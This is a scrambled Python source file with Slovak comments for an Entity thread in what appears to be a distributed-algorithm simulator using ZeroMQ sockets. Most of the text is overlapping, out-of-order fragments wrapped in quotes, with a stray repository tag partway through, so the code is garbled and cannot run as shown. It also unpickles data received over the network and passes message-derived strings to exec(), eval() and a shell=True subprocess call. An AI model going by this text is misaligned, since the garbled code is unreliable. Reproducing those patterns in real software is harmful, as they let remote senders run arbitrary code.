odosieľatela a zvýšíme počet # odoslaných správ", "hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression :", "Action: SEND | Message : {1} | To entity : {2} \".format(_self._id, _message,", "_expression)) except NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier!", "identifier! -> {1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA:", "_self._in_port = _in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours", "sledujeme, či na soket prišla správa. while True: _socks = dict(_poller.poll()) # Ak", "# Pre pozície kde je vo vzore premenná uložíme hodnotu z príslušnej #", "_logger.info(\"Entity: {0} | Action: BECOME | Old state : {1} | New state", "[_recipients] * 1 # Pre každého prijímateľa vytvoríme nový soket typu DEALER [18].", "Action: EVALUATE | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit()", "\"Entity: {0} | Action: EXEC | Wrong value for output cast to int!", "for output cast to int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit()", "{1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s = %s\" %", "_value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression))", "in _self._term_states: _current_state = _self._state # Entita sa spustí impulzom alebo začne čítať", "_state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port =", "{0} | Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior =", "_message = (_message, ) # Ak je prijímateľ iba jeden pretypujeme ho na", "_state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse = False", "= _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message", "eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE |", "identifikátorom odosieľatela a zvýšíme počet # odoslaných správ pre entitu o 1. for", "exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression : {1} \".format(_self._id,", "ktoré sú premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if", "Action: BECOME | Old state : {1} | New state : {2} \".format(_self._id,", "_logger.info(\"Entity: {0} | Action: SEND | Trying to send message to non existing", "Pre uskutočnenie priradenia do nejakej premennej využívame funkciu exec(), # ktorá je jednou", "try: result = eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} |", "\"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\":", "_result.append(False) else: _result.append(None) # Ak v v poli _result nie je hodnota False", "prijatá správa # sa zhoduje so vzorom. if False not in _result: #", "_result.append(None) # Ak v v poli _result nie je hodnota False znamená to,", "sú uchované všetky aktuálne referencie premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__)", "{0} | Action: EXEC | Wrong value for output cast to int! ->", "= _n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node == \"BECOME\":", "[] # Porovnáme správu so vzorom. Ak je na rovnakej pozícii vo vzore", "Thread from pickle import dumps, loads from logging import getLogger from soda.helpers import", "lokálnym # premenným entity, ktoré používateľ opísal v algoritme je nutné predať funkcii", "elif _output_type == 'float': try: _process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info(", "-> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0} |", "| Wrong value! -> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments", "@support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def", "funkcia exec() prístup ku všetkým lokálnym # premenným entity, ktoré používateľ opísal v", "sme mohli následne v metóde run() identifikovať # správanie príslušné tomuto vzoru. return", "Action: EVALUATE | Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute,", "1. for _n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content", "priradenia do nejakej premennej využívame funkciu exec(), # ktorá je jednou zo vstavaných", "\"'\" elif _output_type == 'int': try: _process_output = int(_completed_process.stdout) except ValueError as _Value:", "len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if _i == _j and type(_i)", "pole. if type(_recipients) is int: _recipients = [_recipients] * 1 # Pre každého", "def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result", "vzore a # prijatej správe tá istá hodnota a vo vzore nieje na", "zip(_pattern[1], _received_message): if _i == _j and type(_i) is not tuple: _result.append(True) elif", "'float': try: _process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} |", "= \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\"", "_self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s = %s.pop()\" % (_output, _array)", "is not None: # Vykonáme logiku uzlu. Logika uzlov je opísaná # v", "hodnotu None. if len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if", "getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import", "_i != _j and type(_i) is not tuple: _result.append(False) else: _result.append(None) # Ak", "v v poli _result nie je hodnota False znamená to, že prijatá správa", "použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message :", "{1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor,", "vzoru. return _pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov", ")) # Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} |", "_p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu so vzorom. Ak", "in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _ = _i if type(_j)", "# Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action:", "odošleme správu spolu s identifikátorom odosieľatela a zvýšíme počet # odoslaných správ pre", "_self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej využívame", "type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError", "{2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0} | Action:", "prijatej správe tá istá hodnota a vo vzore nieje na poziícii premenná #", "premenná si uložíme hodnotu None. if len(_pattern[1]) == len(_received_message): for _i, _j in", "+ _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result = eval(_expression, {}, _self.__dict__)", "Action: SEND | Trying to send message to non existing neighbour! -> {1}", "stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie. while _n", "_expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result =", "_context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS", "{0} | Action: EVALUATE | Wrong type of identifier! -> {1} -> {2}", "not tuple: _result.append(False) else: _result.append(None) # Ak v v poli _result nie je", "so správou, ktorú sme # prijali aby sme mohli následne v metóde run()", "existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action:", "Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ", "následne v metóde run() identifikovať # správanie príslušné tomuto vzoru. return _pattern @support_arguments", "{ \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate,", "soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run, PIPE from shlex import split", "do terminujúceho stavu. while _self._state not in _self._term_states: _current_state = _self._state # Entita", "_self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS =", "_input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input),", "execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def run(_self): # Entita vykonáva", "{1} | To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except", "podkapitole 4.2.3 Správanie. if type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n) is", "znamená to, že prijatá správa # sa zhoduje so vzorom. if False not", "Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours]", "True: _socks = dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: #", "# uložíme si do premennej _result hodnotu True. Ak sa hodnoty nezhodujú #", "_expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong", "# Entita sa spustí impulzom alebo začne čítať prijaté správy. if _self._impulse: _self._impulse", "opísal v algoritme je nutné predať funkcii # exec() prostredníctvom tretieho argumenty atribút", "= getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours):", "_i == _j and type(_i) is not tuple: _result.append(True) elif _i != _j", "_logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors,", "[_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read():", "result = None try: result = eval(_expression, {}, _self.__dict__) except NameError as _Name:", "# kde je vo vzore premenná si uložíme hodnotu None. if len(_pattern[1]) ==", "# argumentov, ktoré sú premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients =", "| Action: EXEC | Wrong value for output cast to float! -> {1}", "správa. while True: _socks = dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket) ==", "except ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value! ->", "prečítame a následne extrahujeme obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id", "| Action: EVALUATE | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression))", "ktorom # sú uchované všetky aktuálne referencie premenných a ich hodnôt. try: exec(_expression,", "v ktorom # sú uchované všetky aktuálne referencie premenných a ich hodnôt. try:", "_expression = \"%s = %s\" % (_identifier, _j) # Využijeme akciu entity pre", "_self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie. while _n is not None:", "hodnotu z príslušnej # pozície v správe do tejto premennej. for _i, _j", "na rovnakej pozícii vo vzore a # prijatej správe tá istá hodnota a", "exit() except TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type", "# Ak v v poli _result nie je hodnota False znamená to, že", "# pozície v správe do tejto premennej. for _i, _j in zip(_pattern[1], _received_message):", "for _n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content =", "_recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message", "<gh_stars>0 from zmq import Context, DONTWAIT, Poller, POLLIN, DEALER from threading import Thread", "vstavaných funkcií jazyka Python. Exec() dokáže vykonať # akýkolvek valídny Python príkaz. Príkaz,", "'string': _process_output = \"'\" + _completed_process.stdout + \"'\" elif _output_type == 'int': try:", "_ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip", "_new_state)) # Entita zmení svoj stav na nový. _self._state = _new_state # Ak", "assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop", "vzore premenná uložíme hodnotu z príslušnej # pozície v správe do tejto premennej.", "as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier! -> {1} ->", "_logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier! -> {1} ->", "type(_recipients) is int: _recipients = [_recipients] * 1 # Pre každého prijímateľa vytvoríme", "from pickle import dumps, loads from logging import getLogger from soda.helpers import support_arguments", "všetky aktuálne referencie premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0}", "v metóde run() identifikovať # správanie príslušné tomuto vzoru. return _pattern @support_arguments def", "_id _self._ip = _ip _self._in_port = _in_port _self._state = _state _self._term_states = _term_states", "nutné predať funkcii # exec() prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom", "to correct output type if _output_type == 'string': _process_output = \"'\" + _completed_process.stdout", "_self._state not in _self._term_states: _current_state = _self._state # Entita sa spustí impulzom alebo", "extrahujeme obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity:", "_message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania", "vzormi READ konštrukcií pre # aktuálny stav. for _pattern in list(filter(lambda _p: _p", "aktuálne referencie premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} |", "metóde run() identifikovať # správanie príslušné tomuto vzoru. return _pattern @support_arguments def send(_message,", "| Expression : {1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0} |", "v algoritme je nutné predať funkcii # exec() prostredníctvom tretieho argumenty atribút objektu", ": {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi READ", "správy. _logger.info(\"Entity: {0} | Action: SEND | Trying to send message to non", "support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run, PIPE from shlex", "PIPE from shlex import split from copy import deepcopy _logger = getLogger(__name__) class", "| Action: EXEC | Wrong value for output cast to int! -> {1}", "na pole. if type(_recipients) is int: _recipients = [_recipients] * 1 # Pre", "funkciu exec(), # ktorá je jednou zo vstavaných funkcií jazyka Python. Exec() dokáže", "_neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read(): # V nekonečnom cykle", "hodnoty nezhodujú # a vo vzore nie je na pozícii premenná úložíme hodnotu", ": {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú", "= %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send,", "premenná # uložíme si do premennej _result hodnotu True. Ak sa hodnoty nezhodujú", "run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to correct output type if _output_type", "_received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message : {1}", "_self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message :", "in _self._term_states: exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej", "_j and type(_i) is not tuple: _result.append(False) else: _result.append(None) # Ak v v", "= (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy.", "_j in zip(_pattern[1], _received_message): if _i == _j and type(_i) is not tuple:", "# odoslaných správ pre entitu o 1. for _n in _recipients: try: _out_socket", "# Ak je prijímateľ iba jeden pretypujeme ho na pole. if type(_recipients) is", "_pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor", "vykonať je definovaný # reťazcom _expression. Aby mala funkcia exec() prístup ku všetkým", "-> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity:", "@support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def", "\"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" %", "(_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value)", "def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array,", "soket typu DEALER [18]. Následne # odošleme správu spolu s identifikátorom odosieľatela a", "= _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message = (_message,", "@support_arguments def pop(_array, _output): _expression = \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,))", "{2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def", ": {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval so", "nekonečnom cykle sledujeme, či na soket prišla správa. while True: _socks = dict(_poller.poll())", "premennej _result hodnotu True. Ak sa hodnoty nezhodujú # a vo vzore nie", "ma exec vykonať je definovaný # reťazcom _expression. Aby mala funkcia exec() prístup", "AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong type of identifier!", "si uložíme hodnotu None. if len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1],", "premennej využívame funkciu exec(), # ktorá je jednou zo vstavaných funkcií jazyka Python.", "import run, PIPE from shlex import split from copy import deepcopy _logger =", "False not in _result: # Pre pozície kde je vo vzore premenná uložíme", "definovaný # reťazcom _expression. Aby mala funkcia exec() prístup ku všetkým lokálnym #", "Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as", "-> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s = %s\"", "_logger.info(\"Entity: {0} | Action: RECEIVED | Message : {1} | From entity :", "priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity:", "_recipients = [_recipients] * 1 # Pre každého prijímateľa vytvoríme nový soket typu", "# Vykonáme evaluáciu správy a prijímateľov aby sme napríklad v prípade # argumentov,", "všetkým lokálnym # premenným entity, ktoré používateľ opísal v algoritme je nutné predať", "_j in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _ = _i if", "run, PIPE from shlex import split from copy import deepcopy _logger = getLogger(__name__)", "= len def read(): # V nekonečnom cykle sledujeme, či na soket prišla", "# Ak je tento nový stav terminujúci tak ukončíme správanie. if _self._state in", "| Action: EVALUATE | Wrong type of identifier! -> {1} -> {2} \".format(_self._id,", "| From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so", "\".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval so správou, ktorú", "Iterujeme cez správanie. while _n is not None: # Vykonáme logiku uzlu. Logika", "if type(_j) is str: _j = \"'\" + _j + \"'\" _expression =", "aktuálny stav. for _pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result =", "Expression : {1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0} | Action:", "+= 1 except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action:", "zvýšíme počet # odoslaných správ pre entitu o 1. for _n in _recipients:", "def assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej využívame funkciu exec(), #", "{0} | Action: EXEC | Wrong value for output cast to float! ->", "# Porovnáme správu so vzorom. Ak je na rovnakej pozícii vo vzore a", "_poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n", "def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id", "_self._id = _id _self._ip = _ip _self._in_port = _in_port _self._state = _state _self._term_states", "sa zhodoval so správou, ktorú sme # prijali aby sme mohli následne v", "as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value! -> {1} ->", "pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id", "tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy a", "add, \"REMOVE\": remove, \"POP\": pop } def run(_self): # Entita vykonáva správanie pokiaľ", "# akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec vykonať je definovaný #", "Entita sa spustí impulzom alebo začne čítať prijaté správy. if _self._impulse: _self._impulse =", "for output cast to float! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit()", "run(_self): # Entita vykonáva správanie pokiaľ sa nedostane do terminujúceho stavu. while _self._state", "while True: _socks = dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN:", "= int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN']", "if len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if _i ==", "_self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0}", "a prijímateľov aby sme napríklad v prípade # argumentov, ktoré sú premennými dostali", "_socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne extrahujeme obsah správy a odosieľatela.", "* 1 # Pre každého prijímateľa vytvoríme nový soket typu DEALER [18]. Následne", "vrátime vzor, ktorý sa zhodoval so správou, ktorú sme # prijali aby sme", "_Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier! -> {1} -> {2}", "zhodoval so správou, ktorú sme # prijali aby sme mohli následne v metóde", "_self._term_states: _current_state = _self._state # Entita sa spustí impulzom alebo začne čítať prijaté", "(_identifier, _j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela", "\".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity: {0} | Action: ASSIGN", "while _self._state not in _self._term_states: _current_state = _self._state # Entita sa spustí impulzom", "_n is not None: # Vykonáme logiku uzlu. Logika uzlov je opísaná #", "prijatú správu so všetkými vzormi READ konštrukcií pre # aktuálny stav. for _pattern", "_sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message : {1} |", "vo vzore nieje na poziícii premenná # uložíme si do premennej _result hodnotu", "= \"'\" + _j + \"'\" _expression = \"%s = %s\" % (_identifier,", "+ \"'\" elif _output_type == 'int': try: _process_output = int(_completed_process.stdout) except ValueError as", "stav. for _pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = []", "while _n is not None: # Vykonáme logiku uzlu. Logika uzlov je opísaná", "_neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port = _in_port _self._state =", "_context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT)", "# Porovnámme prijatú správu so všetkými vzormi READ konštrukcií pre # aktuálny stav.", "_command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE,", "BECOME | Old state : {1} | New state : {2} \".format(_self._id, _self._state,", "atribút objektu __dict__, v ktorom # sú uchované všetky aktuálne referencie premenných a", "DONTWAIT, Poller, POLLIN, DEALER from threading import Thread from pickle import dumps, loads", ": {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec vrátime", "{1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0}", "hodnotu False. Pre pozície # kde je vo vzore premenná si uložíme hodnotu", "_identifier, _ = _i if type(_j) is str: _j = \"'\" + _j", "| Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit()", "sme # prijali aby sme mohli následne v metóde run() identifikovať # správanie", "DEALER [18]. Následne # odošleme správu spolu s identifikátorom odosieľatela a zvýšíme počet", "_received_message, _sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval so správou, ktorú sme", "{1} | New state : {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj", "_output_type == 'int': try: _process_output = int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity:", "int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] =", "except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong value", "-> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0} |", "def add(_array, _value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array,", "dumps, loads from logging import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import", "_recipients): # Vykonáme evaluáciu správy a prijímateľov aby sme napríklad v prípade #", "tretieho argumenty atribút objektu __dict__, v ktorom # sú uchované všetky aktuálne referencie", "+ _completed_process.stdout + \"'\" elif _output_type == 'int': try: _process_output = int(_completed_process.stdout) except", "send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add,", "_logger.info(\"Entity: {0} | Action: EVALUATE | Wrong value! -> {1} -> {2} \".format(_self._id,", "output cast to float! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression", "None. if len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if _i", "hodnota False znamená to, že prijatá správa # sa zhoduje so vzorom. if", "= _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id)", "\" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result = eval(_expression, {},", "Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne extrahujeme", "odoslania správy. _logger.info(\"Entity: {0} | Action: SEND | Trying to send message to", "Poller, POLLIN, DEALER from threading import Thread from pickle import dumps, loads from", "_i, _j in zip(_pattern[1], _received_message): if _i == _j and type(_i) is not", "-> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type,", "_out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content)", "prišla správa. while True: _socks = dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket)", "_states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages = 0", "_self._state = _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse", "cykle sledujeme, či na soket prišla správa. while True: _socks = dict(_poller.poll()) #", "identifikovať # správanie príslušné tomuto vzoru. return _pattern @support_arguments def send(_message, _recipients): #", "správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0} |", "identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression)) exit() except ValueError as _Value:", "_i if type(_j) is str: _j = \"'\" + _j + \"'\" _expression", "NameError as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier! -> {1}", "elif type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node == \"BECOME\": break _n", "for _i, _j in zip(_pattern[1], _received_message): if _i == _j and type(_i) is", "in zip(_pattern[1], _received_message): if _i == _j and type(_i) is not tuple: _result.append(True)", "| Action: ASSIGN | Wrong type of identifier! -> {1} -> {2} \".format(_self._id,", "v prípade # argumentov, ktoré sú premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message))", "algoritme je nutné predať funkcii # exec() prostredníctvom tretieho argumenty atribút objektu __dict__,", "správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne extrahujeme obsah správy", "become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove,", "je vo vzore premenná uložíme hodnotu z príslušnej # pozície v správe do", "a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action:", "input=str(_input), 